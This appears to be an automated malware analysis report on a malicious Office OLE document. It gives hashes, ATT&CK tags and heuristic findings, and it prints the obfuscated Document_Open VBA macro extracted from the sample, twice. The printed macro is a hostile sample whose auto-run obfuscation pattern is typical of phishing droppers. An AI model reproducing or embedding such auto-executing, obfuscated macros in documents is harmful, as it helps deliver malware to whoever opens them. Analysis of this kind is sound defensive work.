Office (OLE) malware analysis — malicious · b9c5cc4d13e3268a

MALICIOUS

Office (OLE)

64.9 KB First seen: 2019-01-11

MD5: afa3d8300c580bc1cd99a2dbb6caad50 SHA-1: 5a32d29da94e82e351af8a4d96f5223fea5b3ece SHA-256: b9c5cc4d13e3268a6b51b137b2d20e02a4302d6c545f4226c60877e635ba81eb

102 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro named 'Document_Open' which is automatically executed when the document is opened. The macro code is heavily obfuscated with numerous variable assignments and conditional checks, making its exact function difficult to determine. However, the presence of a 'Document_Open' macro and the obfuscation strongly suggest an intent to download and execute a second-stage payload. The OLE slack space anomaly also indicates potential data hiding or manipulation within the file structure.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 66,456 bytes but its declared streams total only 36,250 bytes — 30,206 bytes (45%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1295 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1295 bytes
SHA-256: `35e7871badfeaa292a39916c70e3890bbb64f720fbb0eedbfd4f1d7d835e176d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "liDwoIjodw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() If iYlGQ <= YlSBrq Then Dim VQbii() sYWcUX = MiRDqG + PUZJCh + PGzdJT + ohpKzf lHwRi = muTPLk + CArSjA + cSXzLD + Yzcttb End If If XMhjY >= 10 Then Dim XaMlfH() GwzYiP = nIFkK + fuTJn + KtSfDD + jvaPs dJNYo = hSSkPH + YRAdHC + lzDoRt + FfYNt End If If iLbfmo Eqv iZvOAP Then Dim WzczR() rlnzQS = bdolG + UlNMi End If If MdsTtw Eqv mkSYY Then Dim nqXiwn() SkzFfK = wqVRJ + YoNZM + vHfnh + iikHFP End If If zRWfUF <> 11 Then Dim sJCYGf() iSTMv = jFZHu + cmuWW + UrTjGb + rJFult End If If Qrbqrr < OVHHFP Then Dim CLwuC() OqZhE = dUzwJ + rzVvL TAvps = DiwGd + ttanP + RulqN + OWzwO End If If wwGtjR Xor AssPk Then Dim dozmjd() nnzLri = NbLnO + fdqoc End If HmMDUGVWRFB (lzjIFtXZwoi + ozawwMolJp + IBaAvS + zbiIr + LYHkB + pYZsIW + IHckAThwz + uhLMfalbqif + znaCG + FiWDXqhF) If DkwdQX >= mhaWVE Then Dim hbXSF() XjqbM = PnqXh + hOKfi + jQzPYw + jZCVvS zzLWu = RAIqw + tEoqJ End If End Sub

SHA-256: 35e7871badfeaa292a39916c70e3890bbb64f720fbb0eedbfd4f1d7d835e176d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "liDwoIjodw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
   If iYlGQ <= YlSBrq Then

Dim VQbii()
sYWcUX = MiRDqG + PUZJCh + PGzdJT + ohpKzf
lHwRi = muTPLk + CArSjA + cSXzLD + Yzcttb

End If
   If XMhjY >= 10 Then

Dim XaMlfH()
GwzYiP = nIFkK + fuTJn + KtSfDD + jvaPs
dJNYo = hSSkPH + YRAdHC + lzDoRt + FfYNt

End If
   If iLbfmo Eqv iZvOAP Then

Dim WzczR()
rlnzQS = bdolG + UlNMi

End If
   If MdsTtw Eqv mkSYY Then

Dim nqXiwn()
SkzFfK = wqVRJ + YoNZM + vHfnh + iikHFP

End If
   If zRWfUF <> 11 Then

Dim sJCYGf()
iSTMv = jFZHu + cmuWW + UrTjGb + rJFult

End If
   If Qrbqrr < OVHHFP Then

Dim CLwuC()
OqZhE = dUzwJ + rzVvL
TAvps = DiwGd + ttanP + RulqN + OWzwO

End If
   If wwGtjR Xor AssPk Then

Dim dozmjd()
nnzLri = NbLnO + fdqoc

End If
HmMDUGVWRFB (lzjIFtXZwoi + ozawwMolJp + IBaAvS + zbiIr + LYHkB + pYZsIW + IHckAThwz + uhLMfalbqif + znaCG + FiWDXqhF)
   If DkwdQX >= mhaWVE Then

Dim hbXSF()
XjqbM = PnqXh + hOKfi + jQzPYw + jZCVvS
zzLWu = RAIqw + tEoqJ

End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.